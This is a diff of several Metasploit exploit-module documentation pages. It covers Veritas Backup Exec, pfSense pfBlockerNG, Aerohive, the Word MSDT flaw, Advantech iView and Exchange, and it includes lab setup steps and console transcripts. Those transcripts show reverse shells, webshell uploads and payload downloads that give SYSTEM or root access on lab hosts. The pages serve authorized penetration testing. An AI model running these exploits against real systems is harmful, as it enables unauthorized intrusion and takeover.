+[*] 192.168.123.147:10000 - Getting supported authentication types
+[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 192.168.123.147:10000 - BE agent revision: 9.3
+[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 192.168.123.147:10000 - Exploiting ...
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
+[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
+[*] 192.168.123.147:10000 - Passing SHA authentication
+[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 192.168.123.147
+[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-BE1QFC9
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.123.147 - Meterpreter session 1 closed.  Reason: User exit
+```
+
+### Linux; Backup Exec 16.0 (Backup Exec Remote Agent, revision 9.2)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
+rhosts => 172.16.199.133
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
+target => 1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.133:10000 - Checking vulnerability
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Getting supported authentication types
+[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
+[*] 172.16.199.133:10000 - BE agent revision: 9.2
+[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 172.16.199.133:10000 - Exploiting ...
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
+[*] 172.16.199.133:10000 - Passing SHA authentication
+[*] 172.16.199.133:10000 - Uploading payload with CmdStager
+[*] 172.16.199.133:10000 - Command Stager progress -  44.15% done (362/820 bytes)
+[*] Sending stage (3020772 bytes) to 172.16.199.133
+[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : debian.test.com
+OS           : Debian 9.13 (Linux 4.9.0-19-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > Interrupt: use the 'exit' command to quit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.16.199.133 - Meterpreter session 2 closed.  Reason: User exit
+```
+
+### Windows; Backup Exec 21.2 (Backup Exec Remote Agent, revision 9.4) - NOT VULNERABLE
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.135
+rhosts => 172.16.180.135
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[*] 172.16.180.135:10000 - The target is not exploitable. SHA authentication is disabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.135:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[-] 172.16.180.135:10000 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. SHA authentication is disabled "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > 
+```
@@ -0,0 +1,189 @@
+## Vulnerable Application
+
+### Description
+This module exploits a vulnerability in the pfSense plugin, pfBlockerNG that allows remote unauthenticated
+attackers to execute execute arbitrary OS commands as root via shell meta characters in the HTTP Host header.
+Versions <= 2.1.4_26 are vulnerable. Note that version 3.x is unaffected.
+
+### Setup
+Download the pfSense image:
+
+`wget https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.5.2-RELEASE-amd64.iso.gz`
+
+To obtain a vulnerable copy of the pfBlockerNG plugin, you can build it from source from the [official pfSense github
+repo](https://github.com/pfsense/FreeBSD-ports/tree/devel/net/pfSense-pkg-pfBlockerNG), or it can be downloaded from
+the following link:
+
+`wget https://files01.netgate.com/pkg/pfSense_plus-v21_09_aarch64-pfSense_plus_v21_09/All/pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+Install the .iso file in your favorite virtualizing software. You may need to use the `UEFI` or `BIOS` installation
+options to install the software correctly. For testing, `BIOS` was used. You may also need to set the WAN settings.
+For this you can just use the default or set it to `hn0` which should also be the default, and this will work fine for
+testing purposes.
+
+Once installed pfSense will start and you can access the web GUI by navigating to `https://<pfSense-IP-address>/`.
+Sign into the application with username: `admin` password: `pfsense`
+
+Now at the top of the screen select System -> Advanced. Scroll down to the section named Secure Shell and tick the box
+beside `Enable Secure Shell`. Then click the `Save` button at the the bottom of the page to apply the changes.
+
+From your host machine we can now transfer the vulnerable package to the pfSense VM using `scp`
+
+`scp pfSense-pkg-pfBlockerNG-2.1.4_26.pkg root@<pfSense-IP-address>:/`
+
+(the root password of the VM will be the same as the admin password: `pfsense`)
+
+Install the vulnerable package with: `pkg install pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+## Options
+
+### WEBSHELL_NAME
+
+This is the name of the webshell that will get uploaded to the pfsense target sans the ".php" ending.
+If left unset the file name will be randomly generated.
+
+## Verification Steps
+
+1. Start msfconsole
+1. `use unix/http/pfsense_pfblockerng_webshell`
+1. Set the `RHOST` and `LHOST` options
+1. `exploit`
+1. Receive a shell as the `root` user
+
+## Scenarios
+### pfSense 2.5.2-RELEASE with pfSense-pkg-pfBlockerNG-2.1.4_26.pkg installed
+```
+msf6 > use exploit/unix/http/pfsense_pfblockerng_webshell
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set RHOSTS 172.23.40.111
+RHOSTS => 172.23.40.111
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LHOST 172.23.47.143
+LHOST => 172.23.47.143
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LPORT 4453
+LPORT => 4453
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set SRVPORT 8383
+SRVPORT => 8383
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        8383             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (bsd/x64/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD    /bin/sh          yes       The command string to execute
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4453             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   BSD Dropper
+
+
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse TCP handler on 172.23.47.143:4453 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading shell...
+[*] Webshell name is: zFOOjmPXX.php
+[+] The target is vulnerable.
+[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
+[*] Using URL: http://172.23.47.143:8383/ITtfiF
+[*] Client 172.23.40.111 (curl/7.76.1) requested /ITtfiF
+[*] Sending payload to 172.23.40.111 (curl/7.76.1)
+[+] Deleted /usr/local/www/zFOOjmPXX.php
+[*] Command shell session 1 opened (172.23.47.143:4453 -> 172.23.40.111:30301) at 2022-10-12 19:08:21 -0500
+
+id
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+uname -a
+FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+exit
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set TARGET 0
+TARGET => 0
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        9933             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (cmd/unix/reverse_openssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4545             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse double SSL handler on 172.23.47.143:4545 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading shell...
+[*] Webshell name is: jIuhcpoe.php
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_openssl
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo XqZbye7zG7tGBVWc;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "XqZbye7zG7tGBVWc\n"
+[*] Matching...
+[*] A is input...
+[+] Deleted /usr/local/www/jIuhcpoe.php
+[*] Command shell session 2 opened (172.23.47.143:4545 -> 172.23.40.111:33941) at 2022-10-12 19:22:13 -0500
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+```
+
@@ -19,10 +19,9 @@ This request includes two POST parameters:
 2. The parameter that is used to execute commands via `/tmp/messages`.
 In our example the name would be `cmd`, but the module sets this to an arbitrary value.

-Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open.
-Closing the session should render the app responsive again.  It is also possible that enabling the meterpreter option
-'TryToFork` might prevent the application hang after exploitation, but given access constraints we were unable to verify the
-resultant behavior for enabling that option.  Try at your own risk (but let us know how it goes if you do).
+Upon successful exploitation, the Aerohive NetConfig application may hang for as long as the spawned shell remains open.
+If the Linux target is selected with a meterpreter payload, the `MeterpreterTryToFork` option is likely to prevent this,
+and is therefore enabled by default. If the app does hang, closing the session should render the app responsive again.

 The module provides an automatic cleanup option to clean the log.
 However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed,
@@ -1,22 +1,27 @@
-There exists a vulnerability in Microsoft Word that leverages the remote template feature to achieveremote code execution against the target.
+There exists a vulnerability in Microsoft Word that leverages the remote template feature to achieve remote code
+execution against the target.

-The vulnerability came to light after an independent cybersecurity research team known as `nao_sec` uncovered a Word document ([05-2022-0438.doc](https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/)) that was uploaded to VirusTotal from an IP address in Belarus.
+The vulnerability came to light after an independent cyber-security research team known as `nao_sec` uncovered a Word
+document ([05-2022-0438.doc](https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/)) that was uploaded to
+VirusTotal from an IP address in Belarus.

-The document uses the remote template feature to fetch an `HTML` document and then uses the `ms-msdt` scheme to execute `PowerShell` code.
+The document uses the remote template feature to fetch an HTML document and then uses the `ms-msdt` scheme to execute
+PowerShell code.

 ## Vulnerable Application

-The vulnerability has been proved in Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365. It also applies to Windows itself, e.g. it can be called from `.lnk` files and with `wget` into `PowerShell`.
+The vulnerability has been found in Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365. It also applies to
+Windows itself, e.g. it can be called from `.lnk` files and with `wget` into `PowerShell`.

-The vulnerability appears exploitable using `.RTF` files on all versions of Office 365, including current channel.
+The vulnerability is exploitable using `.RTF` files on all versions of Office 365, including current channel.

 However, with Insider and Current builds of Office, it doesn't seem to work.

 ### Make your lab

-You need official version of Microsoft Office installed. And stay unpatched for this.
+You need an official version of Microsoft Office installed.

-Tested on Microsoft Windows 10 1909 w/ Microsoft Office Word 2016.
+Tested on Microsoft Windows 10 1909 with Microsoft Office Word 2016.

 ## Verification Steps

@@ -36,11 +41,14 @@ A DOCX file that will be used as a template to build the exploit.

 Obfuscate JavaScript content. Default: true

+**URIPATH**
+The URI for the callback to get the payload.  Testing suggests this must be ANSI compatible and the full URI must be less than 76 characters.
+
 ## Scenarios

 ### Basic use

-1. Generate the exploit as following.
+1. Generate the exploit for docx as following.

 ```
 [*] Started reverse TCP handler on 172.20.32.36:4444 
@@ -86,7 +94,91 @@ Obfuscate JavaScript content. Default: true

 ### The 0-Click tip

-You can get the 0-click by converting, manually, the `.docx` file generated by the module into a `.rtf` file format.
+You can get the 0-click by either selecting the 'rtf' option in converting, manually, the `.docx` file generated by the module into a `.rtf` file format.
+
+### RTF 
+
+1. Generate the exploit for rtf as following.
+```
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options
+
+Module options (exploit/windows/fileformat/word_msdtjs_rce):
+
+Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
+FILENAME        msf.docx         no        The file name.
+OBFUSCATE       true             yes       Obfuscate JavaScript content.
+OUTPUT_FORMAT   docx             yes       File format to use [docx, rtf]. (Accepted: docx, rtf)
+SRVHOST         10.5.135.101     yes       The local host or network interface to listen on. This must be an address on the loca
+l machine or 0.0.0.0 to listen on all addresses.
+SRVPORT         8080             yes       The local port to listen on.
+SSL             false            no        Negotiate SSL for incoming connections
+SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+URIPATH                          no        The URI to use for this exploit (default is random)
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+LHOST                      yes       The listen address (an interface may be specified)
+LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+Id  Name
+   --  ----
+0   Microsoft Office Word
+
+
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set filename test.rtf
+filename => test.rtf
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set output_format rtf
+output_format => rtf
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set lhost 10.5.135.101
+lhost => 10.5.135.101
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set verbose true
+verbose => true
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set disablepayloadhandler false
+disablepayloadhandler => false
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 10.5.135.101:4444
+[*] Using URL: http://10.5.135.101:8080/7eIbCn81aas277
+[*] Server started.
+[*] Generating a malicious rtf file
+[+] test.rtf stored at /home/tmoose/.msf4/local/test.rtf
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > [*] Powershell command length: 3718
+```
+
+2. Upload rtf file to remote host, make sure 'preview' is enabled, and click on the file.  (You don't need to open it, just click once to preview it)
+
+```
+[*] 10.5.132.101     word_msdtjs_rce - Sending HTML Payload
+[*] 10.5.132.101     word_msdtjs_rce - Obfuscate JavaScript content
+[*] 10.5.132.101     word_msdtjs_rce - Sending PowerShell Payload
+[*] Sending stage (200774 bytes) to 10.5.132.101
+[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:51221) at 2022-08-17 10:56:01 -0500
+
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+```

 ## References

@@ -0,0 +1,71 @@
+## Vulnerable Application
+
+Versions of Advantech iView software below `5.7.04.6469` are vulnerable to
+an unauthenticated command injection vulnerability via the `NetworkServlet` endpoint.
+The database backup functionality passes a user-controlled parameter, `backup_file`
+to the `mysqldump` command. The sanitization functionality only tests for SQL injection
+attempts and directory traversal, so leveraging the `-r` and `-w` `mysqldump` flags
+permits exploitation. The command injection vulnerability is used to write a
+payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.
+
+A vulnerable version can be installed from [here](https://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-26RVVS9).
+
+Other versions of the software can be found [here](https://www.advantech.tw/support/details/firmware?id=1-HIPU-183).
+
+### Installation Instructions
+
+Distributed with the installer is a PDF containing detailed installation instructions
+for the software. Once the installation has finished, you may have issues getting the
+Tomcat service to start. If that's the case, follow the steps below (pulled from advantech_iview_unauth_rce.md):
+
+  1. Copy the msvcr100.dll file from C:\Program Files (x86)\Java\jre7\bin to C:\Program Files (x86)\iView\Apache Software Foundation\Tomcat6.0\bin.
+  2. Restart the "Apache Tomcat 6" service. 1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/http/advantech_iview_networkservlet_cmd_inject`
+4. Do: `set RHOST <ip>`
+5. Do: `run`
+6. You should get a meterpreter session.
+
+## Options
+
+## Scenarios
+
+### Advantech iView Webserver `v5.7.04.6425` on Windows 10 21H2 x64
+
+```
+msf6 > use exploit/windows/http/advantech_iview_networkservlet_cmd_inject
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set rhost 192.168.140.197
+rhost => 192.168.140.197
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Using URL: http://192.168.140.1:8080/QVp4zocvVZ9f
+[*] Client 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /QVp4zocvVZ9f
+[*] Sending payload to 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
+[*] Sending stage (200774 bytes) to 192.168.140.197
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.197:50152) at 2022-07-21 16:48:57 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'webapps\iView3\vQbGQrFe.jsp' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-04M9HG7
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -1,895 +0,0 @@
-## Vulnerable Application
-
-### Description
-This vulnerability allows remote attackers to execute arbitrary code
-on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11
-prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3,
-and Exchange Server 2016 CU22 prior to Security Update 2.
-
-Note that authentication is required to exploit this vulnerability.
-
-The specific flaw exists due to the fact that the deny list for the
-ChainedSerializationBinder had a typo whereby an entry was typo'd as
-`System.Security.ClaimsPrincipal` instead of the proper value of
-`System.Security.Claims.ClaimsPrincipal`.
-
-By leveraging this vulnerability, attacks can bypass the
-`ChainedSerializationBinder`'s deserialization deny list
-and execute code as `NT AUTHORITY\SYSTEM`.
-
-Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,
-and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
-
-### Setup
-
-1. Set up a version of Windows Server 2019.
-2. Download Exchange Server 2019 CU11 SU0 from https://download.microsoft.com/download/5/3/e/53e75dbd-ca33-496a-bd23-1d861feaa02a/ExchangeServer2019-x64-CU11.ISO
-3. Follow the guide at https://petri.com/how-to-install-active-directory-in-windows-server-2019-server-manager to turn
-the server into an AD server.
-4. Mount the ISO and run `Setup.exe`. It should prompt you install .NET Framework, Visual Studio C++ Redistributables,
-and Unified Communications Managed API. Install these and then reboot.
-5. Follow https://www.nucleustechnologies.com/blog/step-by-step-guide-to-install-exchange-server-2019-part-1/ and
-install the required features.
-6. Keep running `Setup.exe` and installing extra dependencies as needed as per the links.
-7. When you do get all dependencies installed, Exchange should give a button called `Install` which should no longer be
-greyed out. Press this to install and accept any warnings that appear.
-8. Go to https://*ip here*/owa/ and make sure you can see the Exchange Outlook login page.
-
-## Verification Steps
-
-1. Follow [Setup](#setup) to set up a vulnerable target.
-2. `msfconsole`
-3. `set RHOST <target IP address>`
-4. `set LHOST <IP for target to connect back to>`
-5. `set HttpUsername <username of OWA user to log in as>`
-6. `set HttpPassword <password for this OWA user>`
-7. Optional: `set DOMAIN <domain of OWA user>`
-8. Optional: `set VHOST <vhost of target>`
-9. `exploit`
-10. You should get a shell on the target as `NT AUTHORITY\SYSTEM` if it is vulnerable.
-
-## Targets
-
-### 0
-
-Windows Command
-
-### 1
-
-Windows Dropper
-### 2
-
-PowerShell Stager
-
-## Options
-
-### HttpUsername
-
-Set this to the OWA username. This can also be set to a valid domain username that has permissions to log into Exchange.
-
-### HttpPassword
-
-Set this to the OWA password. This can also be set to the password for a domain user that has permissions to log into Exchange.
-
-## Scenarios
-
-### Exchange Server 2016 CU22 SU0 On Windows Server 2016
-
-#### Target 0 - Windows Command
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
-RHOSTS => 172.24.104.104
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
-LHOST => 172.24.97.166
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (cmd/windows/powershell_reverse_tcp):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   LHOST         172.24.97.166    yes       The listen address (an interface may be speci
-                                            fied)
-   LOAD_MODULES                   no        A list of powershell modules separated by a c
-                                            omma to download over the web
-   LPORT         4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Windows Command
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started reverse TCP handler on 172.24.97.166:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs7u
-[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Powershell session session 1 opened (172.24.97.166:4444 -> 172.24.104.104:8404 ) at 2022-02-22 17:27:02 -0600
-
-PS C:\windows\system32\inetsrv> whoami
-nt authority\system
-PS C:\windows\system32\inetsrv> 
-```
-
-
-#### Target 1 - Windows Dropper
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
-RHOSTS => 172.24.104.104
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
-LHOST => 172.24.97.166
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 1
-target => 1
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
